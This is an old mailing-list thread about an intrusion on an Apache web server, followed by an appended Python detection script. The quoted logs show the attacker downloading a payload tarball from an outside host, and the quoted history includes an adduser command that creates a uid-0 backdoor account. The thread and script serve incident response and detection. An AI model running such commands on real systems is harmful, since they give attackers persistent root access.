Checked, No Root access gen.
No CGI ACCESS - No log in access_log
No Shell Access by wwwrun
Play back his history, root access cannot be done
BTW, what the hell "raver"

Stefan Andreas Tichy wrote:
> On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
> > Follows found in error_log of apache
> >
> > --09:41:10--  http://www.vulturul.org/vulturul/vulturu.tgz
> >            => `vulturu.tgz'
> > Resolving www.vulturul.org... done.
> > Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 9,432 [application/x-tar]
> >
> >     0K .........                                        100%   13.69 KB/s
> >
> > 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
>
> Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
>
> > Also Found his command history:
> >
> > id
> > /usr/sbin/adduser vulturul -u0 -g0 -M;
>
> He has root access but is not sure about that?
>
> At least two problems. Execution of commands as user wwwrun and local root compromise.
>
> I hope the box has been disconnected from the network already.
--
Marco Lum
Net Service Manager
System Development Service
Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190   FAX: +852 2851 1109
Email: enquiry@hkservice.com   WWWeb: http://www.hkservice.com
HK Service Company
HK Service Consultants Limited
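An added example, not part of the thread, of the two checks Stefan's reply calls for: scanning the apache error_log for the wget banner and "saved" line that a CGI running commands as wwwrun leaves behind, and checking /etc/passwd for an extra uid 0 account such as the one the adduser line in the history would create. The error_log and passwd excerpts are constructed inline (modelled on the output quoted above) so the script runs offline.

```python
import re

# Constructed error_log excerpt, modelled on the wget output quoted in the thread.
ERROR_LOG = """\
--09:41:10--  http://www.vulturul.org/vulturul/vulturu.tgz
           => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
"""

# Constructed /etc/passwd excerpt: the third entry is what
# "adduser vulturul -u0 -g0 -M" from the history would produce.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
vulturul:x:0:0::/home/vulturul:/bin/bash
"""

# wget writes its progress to stderr, which Apache appends to error_log when a
# CGI runs it: match the "--HH:MM:SS--  URL" banner and the "saved [n/n]" line.
DOWNLOAD_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)|saved \[(\d+)/\d+\]")

def downloads_in_error_log(text):
    """Return (url, bytes) pairs for completed wget transfers found in error_log text."""
    found = []
    url = None
    for line in text.splitlines():
        m = DOWNLOAD_RE.search(line)
        if not m:
            continue
        if m.group(1):
            url = m.group(1)          # banner: remember the URL being fetched
        elif url:
            found.append((url, int(m.group(2))))  # "saved" line: transfer completed
            url = None
    return found

def extra_uid0_accounts(text):
    """Return names of accounts with uid 0 other than root (a root backdoor indicator)."""
    extra = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            extra.append(fields[0])
    return extra
```

Run both functions over the real error_log and /etc/passwd of the box; a non-empty result from either confirms the corresponding problem Stefan names.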